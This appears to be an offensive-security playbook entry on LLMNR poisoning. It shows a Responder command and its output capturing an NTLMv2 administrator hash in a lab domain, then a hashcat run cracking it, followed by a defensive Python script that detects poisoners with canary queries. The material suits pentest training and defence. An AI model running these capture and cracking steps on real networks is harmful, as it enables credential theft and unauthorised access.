Offensive Playbook

LLMNR

LLMNR (Link-Local Multicast Name Resolution) is used to resolve host names when DNS fails to do so; it is the successor to NBT-NS, which serves the same purpose.

The key flaw is that these services trust whoever answers: a host that receives a suitable response to its query authenticates to the responder and hands over the user's NTLMv2 hash.

Run Responder, listening on the interface facing the target hosts:

kali@kali-[~]$sudo responder -I eth0 -rdw -v

Wait for Responder to poison a request and capture an authentication:

[*] [MDNS] Poisoned answer sent to 192.168.133.147 for name wrongname.local
[*] [LLMNR]  Poisoned answer sent to 192.168.133.147 for name wrongname
[*] [LLMNR]  Poisoned answer sent to 192.168.133.147 for name wrongname
[*] [MDNS] Poisoned answer sent to 192.168.133.147 for name wrongname.local
[SMB] NTLMv2-SSP Client   : 192.168.133.147
[SMB] NTLMv2-SSP Username : HACKME\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::HACKME:31b8abf4813de8cf:...

This hash can then be run through hashcat (mode 5600, NetNTLMv2) in an attempt to crack it offline; the hash is shown truncated below:

kali@kali-[~]$hashcat -m 5600 -a 0 "Administrator::HACKME:31b8abf4813de8cf:..." /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

.....

ADMINISTRATOR::HACKME:31b8abf4813de8cf:a45bda8abc40a3615798bb335dd66475:...:P@ssw0rd

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: ADMINISTRATOR::HACKME:31b8abf4813de8cf:a45bda8abc40...000000
Time.Started.....: Thu Jul 21 16:15:13 2022 (0 secs)
Time.Estimated...: Thu Jul 21 16:15:13 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1331.8 kH/s (1.83ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8192/14344385 (0.06%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 4096/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: newzealand -> whitetiger

Started: Thu Jul 21 16:15:13 2022
Stopped: Thu Jul 21 16:15:15 2022
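As an added defensive example (not part of this playbook), the same trust-whoever-answers behaviour can be turned against a poisoner: query the link for a host name that cannot exist and treat any answer as an alert, since a clean network stays silent. It assumes a Linux host with Python 3 that can send UDP to the 224.0.0.252 multicast group; the `canary-` name prefix and the function names are my own choices.

```python
import random
import socket
import struct
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # LLMNR IPv4 multicast group (RFC 4795)

def build_llmnr_query(name: str, txid: int) -> bytes:
    """One-question LLMNR A query; LLMNR reuses the DNS wire format (flags 0, QDCOUNT 1)."""
    labels = b"".join(bytes([len(p)]) + p.encode("ascii") for p in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + labels + struct.pack("!HH", 1, 1)

def skip_name(data: bytes, pos: int) -> int:
    """Offset just past a name (label sequence or 2-byte compression pointer)."""
    if data[pos] & 0xC0 == 0xC0:
        return pos + 2
    while data[pos]:
        pos += data[pos] + 1
    return pos + 1

def parse_llmnr_response(data: bytes, txid: int) -> list:
    """IPv4 addresses claimed in a response to our txid; [] if the packet is not our answer."""
    if len(data) < 12:
        return []
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000:  # wrong ID, or QR bit clear (not a response)
        return []
    pos, found = 12, []
    for _ in range(qd):
        pos = skip_name(data, pos) + 4  # skip QTYPE + QCLASS
    for _ in range(an):
        pos = skip_name(data, pos)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
        pos += 10
        if rtype == 1 and rdlen == 4:  # A record
            found.append(socket.inet_ntoa(data[pos:pos + 4]))
        pos += rdlen
    return found

def probe(timeout: float = 2.0) -> list:
    """Ask the link for a name nobody has; return (responder IP, address it claimed) per reply."""
    txid, name = random.getrandbits(16), "canary-%08x" % random.getrandbits(32)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            data, (src, _) = sock.recvfrom(4096)
            hits.extend((src, ip) for ip in parse_llmnr_response(data, txid))
    except socket.timeout:
        return hits  # a clean network returns []; anything else is a poisoner to investigate
```

Run `probe()` periodically from a monitoring host on each VLAN; an empty list is the expected state, and the source address of any hit is the machine to investigate.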